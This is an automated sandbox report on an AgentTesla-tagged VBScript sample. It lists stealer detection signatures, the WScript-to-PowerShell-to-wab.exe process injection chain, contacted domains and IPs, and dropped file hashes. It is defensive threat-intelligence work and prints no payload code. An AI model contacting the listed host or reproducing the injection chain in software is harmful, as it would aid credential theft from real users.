Malware Analysis Report

2024-11-30 06:44

Sample ID 240604-bzzrxagg21
Target 83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811.vbs
SHA256 83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811
Tags
agenttesla keylogger spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811

Threat Level: Known bad

The file 83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811.vbs was found to be: Known bad.

Malicious Activity Summary

agenttesla keylogger spyware stealer trojan

AgentTesla

Detect packed .NET executables. Mostly AgentTeslaV4.

Detects executables referencing many email and collaboration clients. Observed in information stealers

Detects executables referencing Windows vault credential objects. Observed in infostealers

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers

Detects executables referencing many file transfer clients. Observed in information stealers

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-04 01:35

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-04 01:35

Reported

2024-06-04 01:38

Platform

win7-20240221-en

Max time kernel

141s

Max time network

145s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Detect packed .NET executables. Mostly AgentTeslaV4.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing Windows vault credential objects. Observed in infostealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many email and collaboration clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many file transfer clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1740 set thread context of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1612 wrote to memory of 2612 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 2612 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 2612 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 2764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2612 wrote to memory of 2764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2612 wrote to memory of 2764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2612 wrote to memory of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1740 wrote to memory of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1740 wrote to memory of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1740 wrote to memory of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1740 wrote to memory of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1740 wrote to memory of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ethicising.Tog && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ethicising.Tog && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.innovativebuildingsolutions.in udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp

Files

memory/2612-4-0x000007FEF54FE000-0x000007FEF54FF000-memory.dmp

memory/2612-5-0x000000001B100000-0x000000001B3E2000-memory.dmp

memory/2612-6-0x0000000002490000-0x0000000002498000-memory.dmp

memory/2612-7-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/2612-8-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/2612-9-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/2612-10-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/2612-11-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/2612-12-0x000007FEF54FE000-0x000007FEF54FF000-memory.dmp

memory/2612-13-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\15NK86W7HSGMM82OWR82.temp

MD5 bbaab6097aed2824bb53cea5c3914838
SHA1 476d90850c849e8b177de936c52be42d7e023e5f
SHA256 87dbb34cdafb3ae97785a700d4bb96063acc73a92893f2c1e4e80e034e5dece6
SHA512 37ff7cf082084712141f840c43e891d079cbb69e0ca7d289e0c69ec2e60fdded381deff29b8849b1fb631ea6aa4920cbc7c3667e5af02ba782a7481506699c9b

C:\Users\Admin\AppData\Roaming\ethicising.Tog

MD5 378d952dc2d926ae171fae5b67cc5e10
SHA1 45e58c20248765d52ed3ebf9b3f8923acf793c5e
SHA256 03c5a0bdba00f06681c1c34fb584ef80cf2901b789aee503a221456b20b942dc
SHA512 b177709a408f26bfc6a38a3763416477d34fb64f78e1a81c5a458849787737d6ea1e515933b88396f6107938203c654011f2e4b3b269c0b7b34d979310bf4e68

memory/1740-20-0x00000000062E0000-0x0000000008358000-memory.dmp

memory/2028-34-0x0000000000220000-0x0000000001282000-memory.dmp

memory/2612-35-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/2028-36-0x0000000000220000-0x0000000000260000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-04 01:35

Reported

2024-06-04 01:38

Platform

win10v2004-20240226-en

Max time kernel

141s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Detect packed .NET executables. Mostly AgentTeslaV4.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing Windows vault credential objects. Observed in infostealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many email and collaboration clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many file transfer clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4352 set thread context of 2680 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3588 wrote to memory of 3376 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3588 wrote to memory of 3376 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 4584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3376 wrote to memory of 4584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3376 wrote to memory of 4352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 4352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 4352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4352 wrote to memory of 3084 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4352 wrote to memory of 3084 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4352 wrote to memory of 3084 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4352 wrote to memory of 2680 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4352 wrote to memory of 2680 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4352 wrote to memory of 2680 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4352 wrote to memory of 2680 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4352 wrote to memory of 2680 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ethicising.Tog && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe


C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ethicising.Tog && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network


Files
